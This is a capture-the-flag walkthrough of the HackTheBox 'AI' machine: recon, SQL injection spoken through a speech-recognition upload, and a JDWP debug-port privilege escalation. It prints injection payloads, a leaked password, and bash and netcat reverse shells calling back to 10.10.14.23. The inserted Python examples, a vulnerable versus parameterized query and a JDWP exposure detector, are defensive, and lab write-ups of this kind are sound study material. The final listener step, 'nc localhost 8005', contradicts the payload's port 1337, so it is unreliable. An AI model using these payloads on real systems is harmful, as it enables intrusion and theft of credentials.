
hackthebox AI | Wh0ale's Blog

source link: https://wh0ale.github.io/2020/02/01/hackthebox-AI/

recon

nmap -sV -sT -sC -o nmapinitial ai.htb

masscan

masscan -p1-65535 10.10.10.163 --rate=1000 -e eth0

nmap is far too slow here; masscan shows ports 22 and 80 open.

Scan the web paths with gobuster

gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt -x php

This finds http://ai.htb/intelligence.php

The screenshot below shows that ai.php is an upload page

intelligence.php contains some instructions on how to use its speech recognition

exploit

ffmpeg

Use ttsmp3.com to generate an audio file, then convert it into a test file:

ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_11_23_15.mp3 ttsMP3.com_VoiceText_2020-2-3_11_23_15.wav

Uploading it shows the content of the test file we created

This method is a bit cumbersome; there is another way

apt install apt-file
apt-file update
apt-file search text2wave
apt-get install festival   # installs text2wave in one step

Then generate the wav file

echo "test" | text2wave -o test.wav

Try a single-quote injection

ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_12_25_27.mp3 ttsMP3.com_VoiceText_2020-2-3_12_25_27.wav
Our understanding of your input is : it's a test
Query result : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's a test'' at line 1

What the box tests is building a SQL injection out of the sentence the AI transcribes

I really couldn't figure this part out, so I copied it straight from the writeup

payload: inject to get the database name

one open single quote union select database open parenthesis close parenthesis comment database
echo "one open single quote union select database open parenthesis close parenthesis comment database" | text2wave -o test.wav
Our understanding of your input is : 1'union select database()-- -
Query result : alexa

The database name is alexa; next I need to enumerate the table names.

payload

one open single quote union select test from test comment database
echo "one open single quote union select test from test comment database" | text2wave -o test.wav
Our understanding of your input is : 1'union select test from test -- -
Query result : Table 'alexa.test' doesn't exist

payload

one open single quote union select test from users comment database
Our understanding of your input is : 1'union select test from users -- -
Query result : Unknown column 'test' in 'field list'

The users table exists

payload

one open single quote union select username from users comment database

We get a response, but no data: the recognizer split "username" into two words

Our understanding of your input is : 1'union select user name from users -- -
Query result : Unknown column 'user' in 'field list'

payload

one open single quote union select password from users comment database

This dumps the data in the password column

Our understanding of your input is : 1'union select password from users -- -
Query result : H,Sq9t6}a<)?q93_
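The bug behind the transcripts above is plain string concatenation: the recognised sentence is dropped into the SQL text, which is why a stray apostrophe breaks the query and why a spoken UNION works. The following is an added example, not code from the writeup or from the box, using Python with an in-memory sqlite3 table in place of MySQL; the phrases/users tables, the WHERE clause and the row contents are assumptions, since the page does not show the real query.

```python
import sqlite3

# Constructed stand-in for the box's alexa database: the real query shape
# is not on the page, so the phrases table and WHERE clause are assumptions.
CONSTRUCTED_USERS = [("alexa", "constructed-secret")]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("CREATE TABLE phrases (text TEXT, reply TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", CONSTRUCTED_USERS)
    db.execute("INSERT INTO phrases VALUES ('hello', 'hi there')")
    return db

def lookup_unsafe(db, transcript):
    # The bug: the speech-to-text output is pasted straight into the SQL
    # string, so  1'union select password from users-- -  closes the
    # literal, appends a second SELECT and comments out the trailing quote.
    sql = f"SELECT reply FROM phrases WHERE text = '{transcript}'"
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, transcript):
    # Hardened form: the transcript is bound as a parameter, so quotes,
    # UNION and comment markers are data, never syntax.
    sql = "SELECT reply FROM phrases WHERE text = ?"
    return [row[0] for row in db.execute(sql, (transcript,))]

def query_result(db, transcript):
    # Same probe the writeup does by hand: a stray apostrophe ("it's a test")
    # breaks the concatenated query, the tell-tale sign of injectable SQL.
    try:
        return lookup_unsafe(db, transcript)
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"

# The transcript the recognizer produced from the spoken payload above.
INJECTED = "1'union select password from users-- -"
```

The same transcript that leaks the password through lookup_unsafe matches nothing in lookup_safe, which is the whole fix.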

SSH as alexa

ssh alexa@ai.htb
password: H,Sq9t6}a<)?q93_
alexa@AI:~$ ls
user.txt
alexa@AI:~$ cat user.txt
c43b62c682a8c*******d4a2cda55e4b

Elevation

alexa@AI:~$ ps aux | grep java
root 38409 17.6 5.6 3137572 113460 ? Sl 08:56 0:03 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start

Check the listening ports: 8000, 8080, 8005, 8009

alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -

Looking at the process again, we can also see that the java binary was started with the following argument:

-agentlib:jdwp=transport=dt_socket,address=localhost:8000
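From the defensive side, the process line above is exactly what a host audit should catch: a JVM started with a jdwp agent, listening, running as root. The following is an added example, not from the writeup, that parses ps aux output for -agentlib:jdwp / -Xrunjdwp options and rates the exposure; the sample ps text is constructed from the line above (shortened) plus a benign JVM for contrast.

```python
import re

# Constructed sample: the Tomcat line from the writeup (trimmed) and one
# benign JVM. In practice feed it the output of `ps aux`.
SAMPLE_PS = """\
root 38409 17.6 5.6 3137572 113460 ? Sl 08:56 0:03 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dcatalina.home=/opt/apache-tomcat-9.0.27 org.apache.catalina.startup.Bootstrap start
tomcat 4120 0.1 2.0 2000000 40000 ? Sl 09:00 0:01 /usr/bin/java -jar /opt/app/app.jar
"""

# Both spellings of the debug agent flag (modern -agentlib and legacy -Xrunjdwp).
JDWP_RE = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")

def parse_jdwp_options(opts):
    # "transport=dt_socket,address=localhost:8000,server=y,suspend=n" -> dict
    return dict(kv.split("=", 1) for kv in opts.split(",") if "=" in kv)

def find_jdwp_agents(ps_text):
    findings = []
    for line in ps_text.splitlines():
        fields = line.split(None, 10)   # ps aux: 10 columns, then COMMAND
        if len(fields) < 11:
            continue
        user, pid, cmd = fields[0], fields[1], fields[10]
        m = JDWP_RE.search(cmd)
        if not m:
            continue
        opts = parse_jdwp_options(m.group(1))
        addr = opts.get("address", "")
        host = addr.split(":")[0] if ":" in addr else ""
        findings.append({
            "user": user, "pid": int(pid), "address": addr,
            "listens": opts.get("server") == "y",
            # A bare port (older JDKs), 0.0.0.0 or * binds every interface;
            # localhost still hands code execution to any local account.
            "reachable_remotely": host in ("", "0.0.0.0", "*"),
            "runs_as_root": user == "root",
        })
    return findings

def jdwp_risk(f):
    # Any listening JDWP agent is arbitrary code execution for whoever can
    # reach the socket; root on every interface is the worst case.
    if not f["listens"]:
        return "info"
    if f["reachable_remotely"]:
        return "critical"
    return "high" if f["runs_as_root"] else "medium"
```

The mitigation is the same in every case: drop the jdwp agent from the production start-up command, or at minimum run the JVM as an unprivileged account.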

I searched for an exploit for this jdwp service and found this one. I uploaded the python script to alexa, then put a reverse shell payload into a file, pwned.sh, which it calls, and ran the exploit:

~/Desktop/Hackthebox/AI/pwn/jdwp-shellifier(master) # searchsploit jdwp
------------------------------------------------- ------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------- ------------------------------------
Java Debug Wire Protocol (JDWP) - Remote Code Ex | exploits/java/remote/46501.py

Upload the pwned.sh script together with jdwp-shellifier

scp -r pwned.sh alexa@ai.htb:/home/alexa   # enter the password and it uploads to the given directory
alexa@AI:~/pwn/jdwp-shellifier$ cat /home/alexa/pwned.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.23/1337 0>&1
# I originally used rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 1337 >/tmp/f but it never gave me a shell back
python jdwp-shellifier.py -t 127.0.0.1 --cmd /home/alexa/pwned.sh

Then open another ssh session from Kali and run:

nc localhost 8005

Success, we have root.

My home broadband is awful; scans kept timing out.

Reference:

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”

